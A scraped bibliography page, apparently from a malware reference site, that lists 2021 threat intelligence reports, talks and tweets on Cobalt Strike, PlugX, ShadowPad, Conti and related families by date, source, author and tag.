Yi-Jhen HsiehShadowPad: the masterpiece of privately sold malware in Chinese espionage PlugX
ShadowPad
×Select Content2021-11-03
⋅
Cisco Talos
⋅
Caitlin Huey,
Chetan Raghuprasad,
Vanja SvajcerMicrosoft Exchange vulnerabilities exploited once again for ransomware, this time with Babuk Babuk
CHINACHOPPER
×Select Content2021-11-03
⋅
Didier Stevens
⋅
Didier StevensNew Tool: cs-extract-key.py Cobalt Strike
×Select Content2021-11-03
⋅
nviso
⋅
Didier StevensCobalt Strike: Using Process Memory To Decrypt Traffic – Part 3 Cobalt Strike
×Select Content2021-11-02
⋅
Intel 471
⋅
Intel 471Cybercrime underground flush with shipping companies’ credentials Cobalt Strike
Conti
×Select Content2021-11-02
⋅
unh4ck
⋅
Cyb3rSn0rlaxDetecting CONTI CobaltStrike Lateral Movement Techniques - Part 2 Cobalt Strike
Conti
×Select Content2021-11-02
⋅
boschko.ca blog
⋅
Olivier LaflammeCobalt Strike Process Injection Cobalt Strike
×Select Content2021-11-01
⋅
The DFIR Report
⋅
@iiamaleks,
@samaritan_oFrom Zero to Domain Admin Cobalt Strike
Hancitor
×Select Content2021-11-01
⋅
Accenture
⋅
Curt Wilson,
Heather Larrieu,
Katrina HillDiving into double extortion campaigns Cobalt Strike
MimiKatz
×Select Content2021-10-29
⋅
Europol
⋅
Europol12 targeted for involvement in ransomware attacks against critical infrastructure Cobalt Strike
Dharma
LockerGoga
MegaCortex
TrickBot
×Select Content2021-10-29
⋅
⋅
Національна поліція України
⋅
Національна поліція УкраїниCyberpolice exposes transnational criminal group in causing $ 120 million in damage to foreign companies Cobalt Strike
Dharma
LockerGoga
MegaCortex
TrickBot
×Select Content2021-10-27
⋅
nviso
⋅
Didier StevensCobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 2 Cobalt Strike
×Select Content2021-10-26
⋅
unh4ck
⋅
Hamza OUADIADetecting CONTI CobaltStrike Lateral Movement Techniques - Part 1 Cobalt Strike
Conti
×Select Content2021-10-26
⋅
Kaspersky
⋅
Kaspersky Lab ICS CERTAPT attacks on industrial organizations in H1 2021 8.t Dropper
AllaKore
AsyncRAT
GoldMax
LimeRAT
NjRAT
NoxPlayer
Raindrop
ReverseRAT
ShadowPad
Zebrocy
×Select Content2021-10-26
⋅
Cisco Talos
⋅
Edmund Brumaghin,
Mariano Graziano,
Nick MavisSQUIRRELWAFFLE Leverages malspam to deliver Qakbot, Cobalt Strike Cobalt Strike
QakBot
Squirrelwaffle
×Select Content2021-10-26
⋅
ANSSIIdentification of a new cyber criminal group: Lockean Cobalt Strike
DoppelPaymer
Egregor
Maze
PwndLocker
QakBot
REvil
×Select Content2021-10-21
⋅
CrowdStrike
⋅
Alex Clinton,
Tasha RobinsonStopping GRACEFUL SPIDER: Falcon Complete’s Fast Response to Recent SolarWinds Serv-U Exploit Campaign Cobalt Strike
FlawedGrace
TinyMet
×Select Content2021-10-21
⋅
nviso
⋅
Didier StevensCobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1 Cobalt Strike
×Select Content2021-10-18
⋅
The DFIR Report
⋅
The DFIR ReportIcedID to XingLocker Ransomware in 24 hours Cobalt Strike
IcedID
Mount Locker
×Select Content2021-10-18
⋅
NortonLifeLock
⋅
Norton LabsOperation Exorcist - 7 Years of Targeted Attacks against the Roman Catholic Church NewBounce
PlugX
Zupdax
×Select Content2021-10-18
⋅
Symantec
⋅
Threat Hunter TeamHarvester: Nation-state-backed group uses new toolset to target victims in South Asia Cobalt Strike
Graphon
×Select Content2021-10-18
⋅
paloalto Netoworks: Unit42
⋅
Brad DuncanCase Study: From BazarLoader to Network Reconnaissance BazarBackdoor
Cobalt Strike
×Select Content2021-10-14
⋅
Medium walmartglobaltech
⋅
Jason ReavesInvestigation into the state of NIM malware Part 2 Cobalt Strike
NimGrabber
Nimrev
Unidentified 088 (Nim Ransomware)
×Select Content2021-10-13
⋅
Blackberry
⋅
BlackBerry Research & Intelligence TeamBlackBerry Shines Spotlight on Evolving Cobalt Strike Threat in New Book Cobalt Strike
×Select Content2021-10-12
⋅
Mandiant
⋅
Alyssa RahmanDefining Cobalt Strike Components So You Can BEA-CONfident in Your Analysis Cobalt Strike
×Select Content2021-10-11
⋅
Accenture
⋅
Accenture Cyber Threat IntelligenceMoving Left of the Ransomware Boom REvil
Cobalt Strike
MimiKatz
RagnarLocker
REvil
×Select Content2021-10-08
⋅
0ffset Blog
⋅
Chuong DongSQUIRRELWAFFLE – Analysing The Main Loader Cobalt Strike
Squirrelwaffle
×Select Content2021-10-07
⋅
Netskope
⋅
Ghanashyam Satpathy,
Gustavo PalazoloSquirrelWaffle: New Malware Loader Delivering Cobalt Strike and QakBot Cobalt Strike
QakBot
Squirrelwaffle
×Select Content2021-10-07
⋅
Mandiant
⋅
Mandiant Research TeamFIN12 Group Profile: FIN12 Priotizes Speed to Deploy Ransomware Aginst High-Value Targets Cobalt Strike
Empire Downloader
TrickBot
×Select Content2021-10-06
⋅
Blackberry
⋅
Blackberry ResearchFinding Beacons in the Dark Cobalt Strike
×Select Content2021-10-05
⋅
Blackberry
⋅
The BlackBerry Research & Intelligence TeamDrawing a Dragon: Connecting the Dots to Find APT41 Cobalt Strike
Ghost RAT
×Select Content2021-10-04
⋅
Sophos
⋅
Chaitanya Ghorpade,
Kajal Katiyar,
Krisztián Diriczi,
Rahil Shah,
Sean Gallagher,
Vikas SinghAtom Silo ransomware actors use Confluence exploit, DLL side-load for stealthy attack ATOMSILO
Cobalt Strike
×Select Content2021-10-04
⋅
The DFIR Report
⋅
The DFIR ReportBazarLoader and the Conti Leaks BazarBackdoor
Cobalt Strike
Conti
×Select Content2021-10-03
⋅
Github (0xjxd)
⋅
Joel DönneSquirrelWaffle - From Maldoc to Cobalt Strike Cobalt Strike
Squirrelwaffle
×Select Content2021-10-01
⋅
0ffset Blog
⋅
Chuong DongSQUIRRELWAFFLE – Analysing the Custom Packer Cobalt Strike
Squirrelwaffle
×Select Content2021-09-30
⋅
PTSecurity
⋅
PT ESC Threat IntelligenceMasters of Mimicry: new APT group ChamelGang and its arsenal Cobalt Strike
×Select Content2021-09-30
⋅
PT Expert Security CenterMasters of Mimicry: new APT group ChamelGang and its arsenal Cobalt Strike
×Select Content2021-09-30
⋅
CrowdStrike
⋅
Falcon OverWatch TeamHunting for the Confluence Exploitation: When Falcon OverWatch Becomes the First Line of Defense Cobalt Strike
×Select Content2021-09-29
⋅
Advanced Intelligence
⋅
Vitali Kremez,
Yelisey BoguslavskiyBackup “Removal” Solutions - From Conti Ransomware With Love Cobalt Strike
Conti
×Select Content2021-09-29
⋅
Malware Traffic Analysis
⋅
Brad Duncan2021-09-29 (Wednesday) - Hancitor with Cobalt Strike Cobalt Strike
Hancitor
×Select Content2021-09-29
⋅
Malware Traffic Analysis
⋅
Brad DuncanHancitor with Cobalt Strike Cobalt Strike
Hancitor
×Select Content2021-09-28
⋅
Recorded Future
⋅
Insikt Group®4 Chinese APT Groups Identified Targeting Mail Server of Afghan Telecommunications Firm Roshan PlugX
Winnti
×Select Content2021-09-28
⋅
Zscaler
⋅
Avinash Kumar,
Brett Stone-GrossSquirrelwaffle: New Loader Delivering Cobalt Strike Cobalt Strike
Squirrelwaffle
×Select Content2021-09-27
⋅
Cynet
⋅
Max MalyutinA Virtual Baffle to Battle Squirrelwaffle Cobalt Strike
Squirrelwaffle
×Select Content2021-09-26
⋅
NSFOCUS
⋅
Jie JiInsights into Ransomware Spread Using Exchange 1-Day Vulnerabilities 1-2 Cobalt Strike
LockFile
×Select Content2021-09-24
⋅
Trend Micro
⋅
Warren Sto.TomasExamining the Cring Ransomware Techniques Cobalt Strike
Cring
MimiKatz
×Select Content2021-09-22
⋅
CISA
⋅
US-CERT: Alert (AA21-265A) Conti Ransomware ⋅ Tags: Cobalt Strike, Conti
2021-09-21 ⋅ Medium elis531989 ⋅ Eli Salem: The Squirrel Strikes Back: Analysis of the newly emerged cobalt-strike loader “SquirrelWaffle” ⋅ Tags: Cobalt Strike, Squirrelwaffle
2021-09-21 ⋅ skyblue.team blog ⋅ skyblue team: Scanning VirusTotal's firehose ⋅ Tags: Cobalt Strike
2021-09-21 ⋅ GuidePoint Security ⋅ Drew Schmitt: A Ransomware Near Miss: ProxyShell, a RAT, and Cobalt Strike ⋅ Tags: Cobalt Strike
2021-09-21 ⋅ Sophos ⋅ Andrew Brandt, Chaitanya Ghorpade, Krisztián Diriczi, Shefali Gupta, Vikas Singh: Cring ransomware group exploits ancient ColdFusion server ⋅ Tags: Cobalt Strike, Cring
2021-09-21 ⋅ eSentire ⋅ eSentire: Ransomware Hackers Attack a Top Safety Testing Org. Using Tactics and Techniques Borrowed from Chinese Espionage Groups ⋅ Tags: Cobalt Strike, MimiKatz, UNC215
2021-09-17 ⋅ CrowdStrike ⋅ Falcon OverWatch Team: Falcon OverWatch Hunts Down Adversaries Where They Hide ⋅ Tags: BazarBackdoor, Cobalt Strike
2021-09-17 ⋅ Medium inteloperator ⋅ Intel Operator: The default: 63 6f 62 61 6c 74 strike ⋅ Tags: Cobalt Strike
2021-09-17 ⋅ Malware Traffic Analysis ⋅ Brad Duncan: 2021-09-17 - SQUIRRELWAFFLE Loader with Cobalt Strike ⋅ Tags: Cobalt Strike, Squirrelwaffle
2021-09-16 ⋅ Twitter (@GossiTheDog) ⋅ Kevin Beaumont: Tweet on an unknown threat actor dropping MgBot, a custom modular IIS backdoor and Cobalt Strike by exploiting ProxyShell ⋅ Tags: Cobalt Strike, MgBot
2021-09-16 ⋅ Medium Shabarkin ⋅ Pavel Shabarkin: Pointer: Hunting Cobalt Strike globally ⋅ Tags: Cobalt Strike
2021-09-16 ⋅ RiskIQ ⋅ RiskIQ: Untangling the Spider Web: The Curious Connection Between WIZARD SPIDER’s Ransomware Infrastructure and a Windows Zero-Day Exploit ⋅ Tags: Cobalt Strike, Ryuk
2021-09-15 ⋅ Microsoft ⋅ Microsoft 365 Defender Threat Intelligence Team, Microsoft Threat Intelligence Center (MSTIC): Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability ⋅ Tags: Cobalt Strike
2021-09-14 ⋅ McAfee ⋅ Christiaan Beek: Operation ‘Harvest’: A Deep Dive into a Long-term Campaign ⋅ Tags: MimiKatz, PlugX, Winnti
2021-09-14 ⋅ Recorded Future ⋅ Insikt Group®: Full-Spectrum Cobalt Strike Detection ⋅ Tags: Cobalt Strike
2021-09-13 ⋅ The DFIR Report ⋅ The DFIR Report: BazarLoader to Conti Ransomware in 32 Hours ⋅ Tags: BazarBackdoor, Cobalt Strike, Conti
2021-09-12 ⋅ Medium michaelkoczwara ⋅ Michael Koczwara: Mapping and Pivoting from Cobalt Strike C2 Infrastructure Attributed to CVE-2021-40444 ⋅ Tags: Cobalt Strike
2021-09-10 ⋅ Gigamon ⋅ Joe Slowik: Rendering Threats: A Network Perspective ⋅ Tags: BumbleBee, Cobalt Strike
2021-09-10 ⋅ The Record ⋅ Catalin Cimpanu: Indonesian intelligence agency compromised in suspected Chinese hack ⋅ Tags: PlugX
2021-09-09 ⋅ Trend Micro ⋅ Trend Micro: Remote Code Execution 0-Day (CVE-2021-40444) Hits Windows, Triggered Via Office Docs ⋅ Tags: BumbleBee, Cobalt Strike
2021-09-09 ⋅ Symantec ⋅ Threat Hunter Team: Grayfly: Chinese Threat Actor Uses Newly-discovered Sidewalk Malware ⋅ Tags: CROSSWALK, MimiKatz, SideWalk
2021-09-08 ⋅ Arash's Blog ⋅ Arash Parsa: Hook Heaps and Live Free ⋅ Tags: Cobalt Strike
2021-09-07 ⋅ Medium michaelkoczwara ⋅ Michael Koczwara: Cobalt Strike C2 Hunting with Shodan ⋅ Tags: Cobalt Strike
2021-09-06 ⋅ kienmanowar Blog ⋅ m4n0w4r: Quick analysis CobaltStrike loader and shellcode ⋅ Tags: Cobalt Strike
2021-09-03 ⋅ FireEye ⋅ Adrian Sanchez Hernandez, Alex Pennino, Andrew Rector, Brendan McKeague, Govand Sinjari, Harris Ansari, John Wolfram, Joshua Goddard, Yash Gupta: PST, Want a Shell? ProxyShell Exploiting Microsoft Exchange Servers ⋅ Tags: CHINACHOPPER, HTran
2021-09-03 ⋅ Sophos ⋅ Anand Ajjan, Andrew Ludgate, Gabor Szappanos, Peter Mackenzie, Sean Gallagher, Sergio Bestulic, Syed Zaidi: Conti affiliates use ProxyShell Exchange exploit in ransomware attacks ⋅ Tags: Cobalt Strike, Conti
2021-09-03 ⋅ Trend Micro ⋅ Mohamad Mokbel: The State of SSL/TLS Certificate Usage in Malware C&C Communications ⋅ Tags: AdWind, ostap, AsyncRAT, BazarBackdoor, BitRAT, Buer, Chthonic, CloudEyE, Cobalt Strike, DCRat, Dridex, FindPOS, GootKit, Gozi, IcedID, ISFB, Nanocore RAT, Orcus RAT, PandaBanker, Qadars, QakBot, Quasar RAT, Rockloader, ServHelper, Shifu, SManager, TorrentLocker, TrickBot, Vawtrak, Zeus, Zloader
2021-09-02 ⋅ Medium michaelkoczwara ⋅ Michael Koczwara: Cobalt Strike PowerShell Payload Analysis ⋅ Tags: Cobalt Strike
2021-09-02 ⋅ Twitter (@th3_protoCOL) ⋅ Colin, GaborSzappanos: Tweet on Confluence Server exploitation (CVE-2021-26084) in the wild and Cobalt Strike activity (mentioned in replies by GaborSzappanos) ⋅ Tags: Cobalt Strike
2021-09-01 ⋅ YouTube (Black Hat) ⋅ Aragorn Tseng, Charles Li: Mem2Img: Memory-Resident Malware Detection via Convolution Neural Network ⋅ Tags: Cobalt Strike, PlugX, Waterbear
2021-09-01 ⋅ YouTube (Hack In The Box Security Conference) ⋅ Joey Chen, Yi-Jhen Hsieh: SHADOWPAD: Chinese Espionage Malware-as-a-Service ⋅ Tags: PlugX, ShadowPad
2021-08-31 ⋅ BreakPoint Labs ⋅ BreakPoint Labs: Cobalt Strike and Ransomware – Tracking An Effective Ransomware Campaign ⋅ Tags: Cobalt Strike
2021-08-30 ⋅ Qianxin ⋅ Red Raindrop Team: Operation (Thủy Tinh) OceanStorm: The evil lotus hidden under the abyss ⋅ Tags: Cobalt Strike, MimiKatz
2021-08-29 ⋅ The DFIR Report ⋅ The DFIR Report: Cobalt Strike, a Defender’s Guide ⋅ Tags: Cobalt Strike
2021-08-27 ⋅ Aon ⋅ Aon’s Cyber Labs, Noah Rubin: Cobalt Strike Configuration Extractor and Parser ⋅ Tags: Cobalt Strike
2021-08-27 ⋅ Morphisec ⋅ Morphisec Labs: ProxyShell Exchange Exploitation Now Leads To An Increasing Amount Of Cobaltstrike Backdoors ⋅ Tags: Cobalt Strike
2021-08-25 ⋅ Trend Micro ⋅ Hara Hiroaki, Ted Lee: Earth Baku An APT Group Targeting Indo-Pacific Countries With New Stealth Loaders and Backdoor ⋅ Tags: Cobalt Strike, SideWalk
2021-08-24 ⋅ ESET Research ⋅ Mathieu Tartare, Thibaut Passilly: The SideWalk may be as dangerous as the CROSSWALK ⋅ Tags: Cobalt Strike, CROSSWALK, SideWalk, SparklingGoblin
2021-08-23 ⋅ Youtube (SANS Digital Forensics and Incident Response) ⋅ Chad Tilbury: Keynote: Cobalt Strike Threat Hunting ⋅ Tags: Cobalt Strike
2021-08-23 ⋅ FBI ⋅ FBI: Indicators of Compromise Associated with OnePercent Group Ransomware ⋅ Tags: Cobalt Strike, MimiKatz
2021-08-23 ⋅ SentinelOne ⋅ Joey Chen, Yi-Jhen Hsieh: ShadowPad: the Masterpiece of Privately Sold Malware in Chinese Espionage ⋅ Tags: PlugX, ShadowPad
2021-08-19 ⋅ Sentinel LABS ⋅ Joey Chen, Yi-Jhen Hsieh: ShadowPad | A Masterpiece of Privately Sold Malware in Chinese Espionage ⋅ Tags: ShadowPad
2021-08-19 ⋅ Blackberry ⋅ BlackBerry Research & Intelligence Team: BlackBerry Prevents: Threat Actor Group TA575 and Dridex Malware ⋅ Tags: Cobalt Strike, Dridex, TA575
2021-08-19 ⋅ Sekoia ⋅ sekoia: An insider insights into Conti operations – Part two ⋅ Tags: Cobalt Strike, Conti
2021-08-18 ⋅ Intezer ⋅ Ryan Robinson: Cobalt Strike: Detect this Persistent Threat ⋅ Tags: Cobalt Strike
2021-08-17 ⋅ Advanced Intelligence ⋅ Vitali Kremez, Yelisey Boguslavskiy: Hunting for Corporate Insurance Policies: Indicators of [Ransom] Exfiltration ⋅ Tags: Cobalt Strike, Conti
2021-08-17 ⋅ Sekoia ⋅ sekoia: An insider insights into Conti operations – Part one ⋅ Tags: Cobalt Strike, Conti
2021-08-17 ⋅ Medium michaelkoczwara ⋅ Michael Koczwara: Cobalt Strike Hunting — DLL Hijacking/Attack Analysis ⋅ Tags: Cobalt Strike
2021-08-15 ⋅ Symantec ⋅ Threat Hunter Team: The Ransomware Threat ⋅ Tags: Babuk, BlackMatter, DarkSide, Avaddon, Babuk, BADHATCH, BazarBackdoor, BlackMatter, Clop, Cobalt Strike, Conti, DarkSide, DoppelPaymer, Egregor, Emotet, FiveHands, FriedEx, Hades, IcedID, LockBit, Maze, MegaCortex, MimiKatz, QakBot, RagnarLocker, REvil, Ryuk, TrickBot, WastedLocker
2021-08-12 ⋅ Sentinel LABS ⋅ SentinelLabs: ShadowPad: A Masterpiece of Privately Sold Malware in Chinese Espionage ⋅ Tags: ShadowPad, Earth Lusca
2021-08-11 ⋅ Advanced Intelligence ⋅ Vitali Kremez: Secret "Backdoor" Behind Conti Ransomware Operation: Introducing Atera Agent ⋅ Tags: Cobalt Strike, Conti
2021-08-09 ⋅ IstroSec ⋅ Ladislav Bačo: APT Cobalt Strike Campaign targeting Slovakia (DEF CON talk) ⋅ Tags: Cobalt Strike
2021-08-05 ⋅ Secureworks ⋅ Counter Threat Unit Research Team: Detecting Cobalt Strike: Government-Sponsored Threat Groups (APT32) ⋅ Tags: Cobalt Strike
2021-08-05 ⋅ Red Canary ⋅ Brian Donohue, Dan Cotton, Tony Lambert: When Dridex and Cobalt Strike give you Grief ⋅ Tags: Cobalt Strike, DoppelDridex, DoppelPaymer
2021-08-04 ⋅ Sentinel LABS ⋅ Gal Kristal: Hotcobalt – New Cobalt Strike DoS Vulnerability That Lets You Halt Operations ⋅ Tags: Cobalt Strike
2021-08-04 ⋅ Secureworks ⋅ Counter Threat Unit Research Team: Detecting Cobalt Strike: Cybercrime Attacks (GOLD LAGOON) ⋅ Tags: Cobalt Strike
2021-08-04 ⋅ CrowdStrike ⋅ CrowdStrike Intelligence Team, CrowdStrike IR, Falcon OverWatch Team: PROPHET SPIDER Exploits Oracle WebLogic to Facilitate Ransomware Activity ⋅ Tags: Cobalt Strike, Egregor, Mount Locker, Prophet Spider
2021-08-03 ⋅ Cybereason ⋅ Assaf Dahan, Daniel Frank, Lior Rochberger, Tom Fakterman: DeadRinger: Exposing Chinese Threat Actors Targeting Major Telcos ⋅ Tags: CHINACHOPPER, Cobalt Strike, MimiKatz, Nebulae
2021-08-02 ⋅ Youtube (Forschungsinstitut Cyber Defense) ⋅ Alexander Rausch, Konstantin Klinger: The CODE 2021: Workshop presentation and demonstration about CobaltStrike ⋅ Tags: Cobalt Strike
2021-08-01 ⋅ The DFIR Report ⋅ The DFIR Report: BazarCall to Conti Ransomware via Trickbot and Cobalt Strike ⋅ Tags: BazarBackdoor, Cobalt Strike, Conti, TrickBot
2021-07-30 ⋅ Twitter (@Unit42_Intel) ⋅ Unit 42: Tweet on a BazarLoader infection leading to Cobalt Strike and a PowerShell script file for the PrintNightmare vulnerability ⋅ Tags: BazarBackdoor, Cobalt Strike
2021-07-29 ⋅ Rasta Mouse ⋅ Rasta Mouse: NTLM Relaying via Cobalt Strike ⋅ Tags: Cobalt Strike
2021-07-29 ⋅ Microsoft ⋅ Microsoft 365 Defender Threat Intelligence Team: BazaCall: Phony call centers lead to exfiltration and ransomware ⋅ Tags: BazarBackdoor, Cobalt Strike
2021-07-27 ⋅ Blackberry ⋅ BlackBerry Research & Intelligence Team: Old Dogs New Tricks: Attackers Adopt Exotic Programming Languages ⋅ Tags: elf.wellmess, ElectroRAT, BazarNimrod, Buer, Cobalt Strike, Remcos, Snake, TeleBot, WellMess, Zebrocy
2021-07-27 ⋅ Palo Alto Networks Unit 42 ⋅ Alex Hinchliffe, Mike Harbison: THOR: Previously Unseen PlugX Variant Deployed During Microsoft Exchange Server Attacks by PKPLUG Group ⋅ Tags: PlugX
2021-07-25 ⋅ Medium svch0st ⋅ svch0st: Guide to Named Pipes and Hunting for Cobalt Strike Pipes ⋅ Tags: Cobalt Strike
2021-07-22 ⋅ Medium michaelkoczwara ⋅ Michael Koczwara: Cobalt Strike Hunting — simple PCAP and Beacon Analysis ⋅ Tags: Cobalt Strike
2021-07-21 ⋅ Bitdefender ⋅ Bogdan Botezatu, Victor Vrabie: LuminousMoth – PlugX, File Exfiltration and Persistence Revisited ⋅ Tags: PlugX
2021-07-20 ⋅ Secureworks ⋅ Counter Threat Unit Research Team: Ongoing Campaign Leveraging Exchange Vulnerability Potentially Linked to Iran ⋅ Tags: CHINACHOPPER, MimiKatz, RGDoor
2021-07-19 ⋅ The DFIR Report ⋅ The DFIR Report: IcedID and Cobalt Strike vs Antivirus ⋅ Tags: Cobalt Strike, IcedID
2021-07-14 ⋅ Clement Lecigne, Google Threat Analysis Group, Maddie Stone: How We Protect Users From 0-Day Attacks (CVE-2021-21166, CVE-2021-30551, CVE-2021-33742, CVE-2021-1879) ⋅ Tags: Cobalt Strike
2021-07-14 ⋅ MDSec ⋅ Chris Basnett: Investigating a Suspicious Service ⋅ Tags: Cobalt Strike
2021-07-14 ⋅ Kaspersky ⋅ Aseel Kayal, Mark Lechtik, Paul Rascagnères: LuminousMoth APT: Sweeping attacks for the chosen few ⋅ Tags: Cobalt Strike
2021-07-13 ⋅ YouTube (Matt Soseman) ⋅ Matt Soseman: Solarwinds and SUNBURST attacks compromised my lab! ⋅ Tags: Cobalt Strike, Raindrop, SUNBURST, TEARDROP
2021-07-09 ⋅ InfoSec Handlers Diary Blog ⋅ Brad Duncan: Hancitor tries XLL as initial malware file ⋅ Tags: Cobalt Strike, Hancitor
2021-07-08 ⋅ Avast Decoded ⋅ Threat Intelligence Team: Decoding Cobalt Strike: Understanding Payloads ⋅ Tags: Cobalt Strike, Empire Downloader
2021-07-08 ⋅ PTSecurity ⋅ Denis Kuvshinov: How winnti APT grouping works ⋅ Tags: Korlia, ShadowPad, Winnti
2021-07-08 ⋅ Recorded Future ⋅ Insikt Group: Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling ⋅ Tags: Cobalt Strike, Earth Lusca
2021-07-08 ⋅ Recorded Future ⋅ Insikt Group®: Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling ⋅ Tags: ShadowPad, Spyder, Winnti
2021-07-08 ⋅ YouTube (PT Product Update) ⋅ Denis Kuvshinov: How winnti APT grouping works ⋅ Tags: Korlia, ShadowPad, Winnti
2021-07-07 ⋅ Trustwave ⋅ Nikita Kazymirskyi, Rodel Mendrez: Diving Deeper Into the Kaseya VSA Attack: REvil Returns and Other Hackers Are Riding Their Coattails ⋅ Tags: Cobalt Strike, REvil
2021-07-07 ⋅ Trend Micro ⋅ Gloria Chen, Jaromír Hořejší, Joseph C Chen, Kenney Lu: BIOPASS RAT: New Malware Sniffs Victims via Live Streaming ⋅ Tags: BIOPASS, Cobalt Strike, Derusbi
2021-07-07 ⋅ McAfee ⋅ McAfee Labs: Ryuk Ransomware Now Targeting Webservers ⋅ Tags: Cobalt Strike, Ryuk
2021-07-06 ⋅ Twitter (@MBThreatIntel) ⋅ Malwarebytes Threat Intelligence: Tweet on a malspam campaign that takes advantage of the Kaseya VSA ransomware attack to drop Cobalt Strike ⋅ Tags: Cobalt Strike
2021-07-05 ⋅ Trend Micro ⋅ Abraham Camba, Buddy Tancio, Catherine Loveria, Ryan Maglaque: Tracking Cobalt Strike: A Trend Micro Vision One Investigation ⋅ Tags: Cobalt Strike
2021-07-03 ⋅ Medium AK1001 ⋅ AK1001: Analyzing Cobalt Strike PowerShell Payload ⋅ Tags: Cobalt Strike
2021-07-02 ⋅ MalwareBookReports ⋅ muzi: Skip the Middleman: Dridex Document to Cobalt Strike ⋅ Tags: Cobalt Strike, Dridex
2021-07-01 ⋅ The Record ⋅ Catalin Cimpanu: Mongolian certificate authority hacked eight times, compromised with malware ⋅ Tags: Cobalt Strike
2021-07-01 ⋅ Avast Decoded ⋅ Igor Morgenstern, Jan Vojtěšek, Luigino Camastra: Backdoored Client from Mongolian CA MonPass ⋅ Tags: Cobalt Strike, Earth Lusca
2021-07-01 ⋅ Avast Decoded ⋅ Igor Morgenstern, Jan Vojtěšek, Luigino Camastra: Backdoored Client from Mongolian CA MonPass ⋅ Tags: Cobalt Strike, FishMaster
2021-06-30 ⋅ Group-IB ⋅ Oleg Skulkin: REvil Twins Deep Dive into Prolific RaaS Affiliates' TTPs ⋅ Tags: Cobalt Strike, REvil
2021-06-29 ⋅ Accenture ⋅ Accenture Security: HADES ransomware operators continue attacks ⋅ Tags: Cobalt Strike, Hades, MimiKatz
2021-06-29 ⋅ Proofpoint ⋅ Daniel Blackford, Selena Larson: Cobalt Strike: Favorite Tool from APT to Crimeware ⋅ Tags: Cobalt Strike
2021-06-28 ⋅ The DFIR Report ⋅ The DFIR Report: Hancitor Continues to Push Cobalt Strike ⋅ Tags: Cobalt Strike, Hancitor
2021-06-22 ⋅ CrowdStrike ⋅ The Falcon Complete Team: Response When Minutes Matter: Falcon Complete Disrupts WIZARD SPIDER eCrime Operators ⋅ Tags: Cobalt Strike
2021-06-22 ⋅ Twitter (@Cryptolaemus1) ⋅ Cryptolaemus, dao ming si, Kirk Sayre: Tweet on TA575, a Dridex affiliate delivering Cobalt Strike (packed with CryptOne) directly via the macro docs ⋅ Tags: Cobalt Strike, Dridex
2021-06-20 ⋅ The DFIR Report ⋅ The DFIR Report: From Word to Lateral Movement in 1 Hour ⋅ Tags: Cobalt Strike, IcedID
2021-06-18 ⋅ SecurityScorecard ⋅ Ryan Sherstobitoff: SecurityScorecard Finds USAID Hack Much Larger Than Initially Thought ⋅ Tags: Cobalt Strike
2021-06-17 ⋅ Binary Defense ⋅ Brandon George: Analysis of Hancitor – When Boring Begets Beacon ⋅ Tags: Cobalt Strike, Ficker Stealer, Hancitor
2021-06-16 ⋅ Mandiant ⋅ Jared Wilson, Jordan Nuce, Justin Moore, Mike Hunhoff, Nick Harbour, Robert Dean, Tyler McLellan: Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise ⋅ Tags: Cobalt Strike, SMOKEDHAM
2021-06-16 ⋅ Recorded Future ⋅ Insikt Group®: Threat Activity Group RedFoxtrot Linked to China’s PLA Unit 69010; Targets Bordering Asian Countries ⋅ Tags: Icefog, PcShare, PlugX, Poison Ivy, QuickHeal, DAGGER PANDA
2021-06-16 ⋅ Національної поліції України ⋅ Національна поліція України (National Police of Ukraine): Cyberpolice exposes hacker group in spreading encryption virus and causing half a billion dollars in damage to foreign companies ⋅ Tags: Clop, Cobalt Strike, FlawedAmmyy
2021-06-16 ⋅ FireEye ⋅ Jared Wilson, Justin Moore, Mike Hunhoff, Nick Harbour, Robert Dean, Tyler McLellan: Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise ⋅ Tags: Cobalt Strike, SMOKEDHAM
2021-06-15 ⋅ Secureworks ⋅ Counter Threat Unit Research Team: Hades Ransomware Operators Use Distinctive Tactics and Infrastructure ⋅ Tags: Cobalt Strike, Hades
2021-06-12 ⋅ Twitter (@AltShiftPrtScn) ⋅ Peter Mackenzie: A thread on the RagnarLocker ransomware group's TTPs seen in an incident response ⋅ Tags: Cobalt Strike, RagnarLocker
2021-06-10 ⋅ Group-IB ⋅ Nikita Rostovcev: Big airline heist APT41 likely behind massive supply chain attack ⋅ Tags: Cobalt Strike
2021-06-10 ⋅ ESET Research ⋅ Adam Burgher: BackdoorDiplomacy: Upgrading from Quarian to Turian ⋅ Tags: CHINACHOPPER, DoublePulsar, EternalRocks, turian, BackdoorDiplomacy
2021-06-09 ⋅ Twitter (@RedDrip7) ⋅ RedDrip7: Tweet on in-the-wild exploitation of CVE-2021-26868 (according to @_clem1) ⋅ Tags: Cobalt Strike
2021-06-04 ⋅ Twitter (@alex_lanstein) ⋅ Alex Lanstein: Tweet on UNC2652/NOBELIUM targeting iOS users by exploiting CVE-2021-1879 ⋅ Tags: Cobalt Strike
2021-06-04 ⋅ Inky ⋅ Roger Kay: Colonial Pipeline Ransomware Hack Unleashes Flood of Related Phishing Attempts ⋅ Tags: Cobalt Strike
2021-06-02 ⋅ Sophos ⋅ Sean Gallagher: AMSI bypasses remain tricks of the malware trade ⋅ Tags: Agent Tesla, Cobalt Strike, Meterpreter
2021-06-02 ⋅ Medium CyCraft ⋅ CyCraft Technology Corp: China-Linked Threat Group Targets Taiwan Critical Infrastructure, Smokescreen Ransomware ⋅ Tags: Cobalt Strike, ColdLock
2021-06-02 ⋅ Twitter (@xorhex) ⋅ Xorhex: Tweet on a new variant of PlugX from the RedDelta group ⋅ Tags: PlugX
2021-06-02 ⋅ xorhex blog ⋅ Twitter (@xorhex): RedDelta PlugX Undergoing Changes and Overlapping Again with Mustang Panda PlugX Infrastructure ⋅ Tags: PlugX
2021-06-01 ⋅ Department of Justice ⋅ Office of Public Affairs: Justice Department Announces Court-Authorized Seizure of Domain Names Used in Furtherance of Spear-Phishing Campaign Posing as U.S. Agency for International Development ⋅ Tags: Cobalt Strike
2021-06-01 ⋅ SentinelOne ⋅ Juan Andrés Guerrero-Saade: NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks ⋅ Tags: Cobalt Strike
